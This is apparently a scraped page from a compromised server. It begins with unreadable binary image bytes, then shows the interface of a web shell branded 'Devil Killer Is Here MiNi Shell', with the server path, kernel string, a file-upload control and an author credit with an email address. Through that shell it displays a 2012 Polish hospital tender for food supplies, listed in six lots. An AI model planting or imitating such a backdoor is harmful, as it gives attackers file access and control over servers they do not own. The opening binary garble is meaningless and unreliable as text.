JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120213/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120213/35467-N-2012.html

<p class="kh_header"><b>Tarnów: zakup i dostawa artykułów żywnościowych</b><br>
<b>Numer ogłoszenia: 35467 - 2012; data zamieszczenia: 13.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki im. św. Łukasza SPZOZ , ul. Lwowska 178a, 33-100 Tarnów, woj. małopolskie, tel. 014 6315460, faks 014 6315460, 6212581.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zakup i dostawa artykułów żywnościowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres I	Pieczywo
Zakres II	Artykuły ogólnospożywcze
Zakres III	Mleka i Odżywki dla dzieci
Zakres IV	Artykuły sypkie zbożowe
Zakres V	Przyprawy
Zakres VI	Miód.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6, 15.80.00.00-6, 15.51.17.00-0, 15.61.22.00-3, 15.89.19.00-9, 15.87.22.00-3, 15.83.16.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że Wykonawca dysponuje co najmniej jednym środkiem transportu spełniającym warunki określone w rozporządzeniu ministra zdrowia z dnia 19 grudnia 2002roku w sprawie wymagań sanitarnych dot.: środków transportu żywności, substancji pomagających w przetwarzaniu, dozwolonych substancji dodatkowych i innych składników żywności.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że Wykonawca dysponuje osobą lub osobami zdolnymi do wykonania zamówienia, spełniającymi wymaganiami określone w ustawie z dnia 5 grudnia 20008 r. bo zapobieganiu oraz zwalczaniu zakażeń i chorób zakaźnych u ludzi</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)Oświadczenie , że Wykonawca  posiada stosowne atesty lub świadectwa dopuszczające do spożycia zgodnie z obowiązującymi przepisami.
2)Oświadczenie, że Wykonawca dysponuje co najmniej jednym środkiem transportu spełniającym warunki określone w rozporządzeniu ministra zdrowia z dnia 19 grudnia 2002 roku w sprawie wymagań sanitarnych dot.: środków transportu żywności, substancji pomagających w przetwarzaniu, dozwolonych substancji dodatkowych i innych składników żywności.
3) Oświadczenie, że Wykonawca dysponuje osobą lub osobami zdolnymi do wykonania zamówienia, spełniającymi wymaganiami określone w ustawie z dnia 5 grudnia 20008 r. bo zapobieganiu oraz zwalczaniu zakażeń i chorób zakaźnych u ludzi</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pełnomocnictwo do podpisania oferty i składania ewentualnych wyjaśnień, jeżeli osoba podpisująca nie jest osoba upoważnioną na podstawie odpisu z Krajowego Rejestru Sadowego. Jeżeli ofertę podpisuje osoba fizyczna celem weryfikacji należy dołączyć zaświadczenie o wpisie do ewidencji działalności gospodarczej. Jeżeli dołączone do oferty ww. pełnomocnictwo będzie w formie kopii, Zamawiający wymaga, aby jego zgodność z oryginałem poświadczyła osoba wymieniona w rejestrze, która jest wskazana, jako upoważniona do reprezentowania Wykonawcy lub notariusz.
2) oświadczenie w trybie art. 22 ust.1 ustawy PZP</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W trakcie trwania umowy możliwa jest zmiana cen tylko w przypadku zmiany: 
1. zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lukasz.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SZPITAL WOJEWÓDZKI IM. ŚW. ŁUKASZA W TARNOWIE SAMODZIELNYM PUBLICZNY ZAKŁADZIE OPIEKI ZDROWOTNEJ 33-100 TARNÓW, UL. LWOWSKA 178A (pawilon D II piętro) dział Logistyki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2012 godzina 10:00, miejsce: SZPITAL WOJEWÓDZKI IM. ŚW. ŁUKASZA W TARNOWIE SAMODZIELNYM PUBLICZNY ZAKŁADZIE OPIEKI ZDROWOTNEJ 33-100 TARNÓW, UL. LWOWSKA 178A (pawilon D II piętro) Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 21.03.2012.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Chleb pszenny tradycyjny	kg.	19 000
2.	Chleb pszenno-żytni tradycyjny	kg.	24 000
3.	Graham tradycyjny 	kg.	11 000
4.	Weka	kg.	100
5.	Bułka tarta	kg.	900
6.	Drożdżówka z serem	kg.	300
7.	Drożdżówka z marmoladą 	kg. 	300
8.	Cwibak	kg.	60
9.	Babka drożdżowa	kg.	100
10.	Chleb słonecznikowy	kg.	10
11.	Bułeczki z ziarnem 	kg.	200
12.	Bagietka	kg.	20
13.	Keks	kg.	30
14.	Chałka z kruszonką	kg.	60
15.	Bułka zwykła 100g	szt.	200
16.	Szarlotka	kg.	100
17.	Babka piaskowa	kg.	30
18.	Drożdże	kg.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Artykuły ogólnospożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Cukier  (opakowanie jednostkowe 1 kg)	kg.	18 000
2.	Biszkopty	kg.	180
3.	Suchary dietetyczne ( delikatesowe)	kg.	400
4.	Chrupki kukurydziane	kg.	350
5.	Herbata granulowana 	kg.	700
6.	Kakao naturalne	kg.	110
7.	Kawa inka	kg.	140
8.	Ocet(opakowanie jednostkowe ? l)	litr	200
9.	Olej uniwersalny (rzepakowy)	litr	1 000
10.	Bita śmietanka (w proszku)	kg.	5
11.	Krakersy	kg.	800
12.	Herbatniki z cukrem	kg.	250
13.	Musztarda	kg.	450
14.	Majonez	kg.	600
15.	Migdały (płatki)	kg.	3
16.	Śliwka kalifornijska	kg.	20
17.	Morela suszona	kg.	5
18.	Kawa rozpuszczalna Nescafe classic a 100g 	szt. 	20
19.	Kawa rozpuszczalna Nescafe classic a 200g 	szt. 	15
20.	Groszek ptysiowy	kg.	60
21.	Rodzynki	kg.	10
22.	Wafel tortowy	szt. 	10
23.	Herbata Lipton (ekspresowa 25 szt)	szt. 	20
24.	Sok owocowy bez cukru (karton1 l-czarna porzeczka)	szt. 	2 000
25.	Sok owocowy bez cukru (karton1 l-pomarańcza)     	szt. 	2 000
26.	Sok owocowy bez cukru(karton1 l-jabłko)   	szt. 	3 000
27.	Sok owocowy bez cukru(karton1l-multiwitamina)  	szt. 	1 000
28.	Sok owocowy ( 0.20 l-pomarańcza)  	szt. 	1 000
29.	Napój owocowy (0,20 l-pomarańcza)	szt. 	1 000
30.	Woda mineralna gazowana (butelka 0,33l)	szt. 	130 000
31.	Woda mineralna Piwniczanka (1,5l - lekko gazowana )	szt. 	600
32.	Woda mineralna Piwniczanka (1,5l - niegazowana )	szt. 	300
33.	Syrop  malinowy  (op. jedn. 0,5 l  )	szt. 	200
34.	Maggi przyprawa w płynie 1 l	szt. 	1 000
35.	Maggi przyprawa w płynie 0,2 l	szt. 	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mleka i Odżywki dla dzieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Bebiko 1 (350g)	szt.	400
2.	Bebiko 2 (350g)	szt.	400
3.	Bebiko 3 ( 350g)		90
4.	Bebilon 1 (800 g)	szt.	200
5.	Bebilon 2 (800 g)	szt.	150
6.	Bebilon 3 (800g)                                                                          	szt.	90
7.	Gerber 1 ( 350g)	szt.	60
8.	Gerber 2 ( 350g)	szt.	60
9.	Nan Pro 1 ( 350g)	szt.	400
10.	Nan Pro 2 ( 350g)	szt.	200
11.	Nan Pro HA 1 ( 400g)	szt.	90
12.	Nan Pro 3 ( 350g)	szt.	90
13.	Hipp 1 Bio Combiotic ( 350g)	szt.	90
14.	Hipp 2 Bio Combiotic ( 350g)	szt.	90
15.	Kleik ryżowy 170 g	szt.	250
16.	Kleik kukurydziany 170 g	szt.	50
17.	Kaszka ryżowa z jabłkami 180 g	szt.	200
18.	Kaszka ryżowa z malinami 180 g	szt.	50
19.	Kaszka mleczno ryzowa z bananami 180g	szt.	90
20.	Kaszka mleczno ryzowa z truskawkami 180g	szt.	90
21.	Kaszka mleczno ryzowa wieloowocowa180g	szt.	60
22.	Kaszka mleczno pszenna wieloowocowa180g	szt.	36
23.	Zupa marchwiowa z ryżem 125	szt.	800
24.	Zupa jarzynowa z kurczakiem 130g	szt.	400
25.	Zupa jarzynowa z królikiem 130g	szt.	400
26.	Zupa jarzynowa z indykiem 130g	szt.	400
27.	Zupa jarzynowa z cielęciną  130g	szt.	200
28.	Zupa jarzynowa z jagnięciną 130g	szt.	200
29.	Zupa z indykiem 190g	szt.	200
30.	Zupa z królikiem 190g	szt.	200
31.	Zupa z cielęciną 190g	szt.	200
32.	Zupa z jagnięciną 190g	szt.	200
33.	Jabłko przetarte 130 g	szt.	1 500
34.	Marchew przetarte 125-130g	szt.	150
35.	Kasza manna błyskawicza	kg.	10
36.	Bobo frut 0.175l	szt.	7 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.17.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Artykuły sypkie zbożowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ryż długoziarnisty  (opak.  jedn. 1kg)	kg.	5 000
2.	Mąka pszenna typ 500  (opak. Jedn. 1kg)	kg.	1 200
3.	Mąka ziemniaczana (opak. jedn. max 1kg)	kg.	500
4.	Mąka kukurydziana(opak. jedn. max 1kg)	kg.	10
5.	Kasza manna (opak.  Jedn.  max 1kg)	kg.	2000
6.	Kasza kukurydziana (opak.  Jedn. max 1kg) 	kg.	1500
7.	Kasza jęczmienna(opak. jedn. max1kg)	kg.	1600
8.	Kasza gryczana (opak.  jedn.max1kg)	kg.	30
9.	Płatki jęczmienne (opak.  jedn. max 1kg)	kg.	1400
10.	Płatki owsiane górskie(opak. jedn. max 1kg)	kg.	1700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.22.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Majeranek	kg.	5
2.	Koper suszony	kg.	5
3.	Papryka mielona-słodka	kg.	5
4.	Papryka mielona-ostra	kg.	1
5.	Kminek	kg.	7
6.	Ziele angielskie 	kg.	8
7.	Liść laurowy	kg.	5
8.	Przyprawa do potraw greckich GYROS kg.	2
9.	Curry	kg.	1
10.	Sos do drobiu 	kg.	80
11.	Sos pieczarkowy (grzybowy Knor)	kg.	80
12.	Sos z zielonym pieprzem ( Knor)	kg.	10
13.	Sos włoski sałatkowy	kg.	30
14.	Sos biały	kg.	100
15.	Zupa pieczarkowa ( Knor)	kg.	130
16.	Bazylia 	kg.	2
17.	Żelatyna	kg.	80
18.	Fix do potraw chińskich Knor	kg.	15
19.	Pieprz ziołowy (mielony)	kg.	5
20.	Kokos	kg.	3
21.	Sól jodowana	kg.	2500
22.	Rosół wołowy 	kg.	150
23.	Oregano	kg.	1
24.	Rosół drobiowy	kg.	350
25.	Rosół jarzynowy	kg.	700
26.	Vegeta	kg.	100
27.	Pieprz czarny mielony	kg.	20
28.	Kwasek cytrynowy	kg.	50
29.	Cynamon	kg.	2
30.	Cukier waniliowy	kg.	12
31.	Proszek do pieczenia	kg.	5
32.	Cukier puder	kg.	50
33.	Kisiel  bez cukru ( opak.jedn.max. 1kg) 	kg.	70
34.	Budyń  bez cukru ( opak.jedn.max. 1kg) 	kg.	70
35.	Galaretka owocowa  ( opak.jedn.max. 1kg) 	kg.	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.19.00-9, 15.87.22.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Miód.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Miód naturalny ( opak.jedn.do. 1,5 kg)	kg.	1 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com